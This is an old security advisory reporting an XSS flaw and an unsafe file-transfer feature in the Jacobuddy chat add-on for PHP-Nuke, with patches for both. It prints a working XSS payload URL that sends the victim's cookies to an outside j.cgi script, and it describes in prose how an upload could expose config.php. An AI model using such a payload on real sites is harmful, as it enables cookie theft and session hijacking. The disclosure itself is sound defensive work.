Jacobuddy Cross Site Scripting (XSS) And Upload Exploit
Date: Saturday, March 01 @ 23:44:02 CET Topic: Security
Officially Released For Publication by Computer Cops.
Jacobuddy a Javascript Real Time Chat Module is an independent add-on for the open source GNU/GPL content management system PHP-Nuke. Computer Cops has discovered that Jacobuddy version 3.0 is vulnerable to Cross Site Scripting (XSS) and file system manipulation. It is our belief to contact the author prior to a public posting, but in this case we have supplied a fix for both vulnerabilities of this addon.
The following URL is a sample of how Jacobuddy can be seeded with a XSS exploit within the message body:
http://www.laudanski.com/"style="background-image:url(javascript:nurl='http://www.laudanski.com/j.cgi?';nurl=nurl+document.cookie;document.URL=nurl)
The current unpatched version will automatically redirect the receiver's pop-up Jacobuddy message to another site grabbing their cookie information from the attacked site.
The patch for this is applied to the buddy.php file:
In the following function block:
function send($to, $to_userid, $message, $subject) {
Add the following line after the global statement:
$message = htmlspecialchars(strip_tags($message));
The next vulnerability is the infamous dcc file transfer within the buddy.php file.
Any file uploaded into the system can stay on the system. A malicious script can be generated to grab vital file system data like the php-nuke config.php file and turned into a text file for the malicious uploader to access. Computer Cops highly advises that the entire dcc function be removed from the file in addition to the dcc case block and $who_online clause for the dcc link.
Computer Cops will make an attempt to contact the vendor with this information.
|
|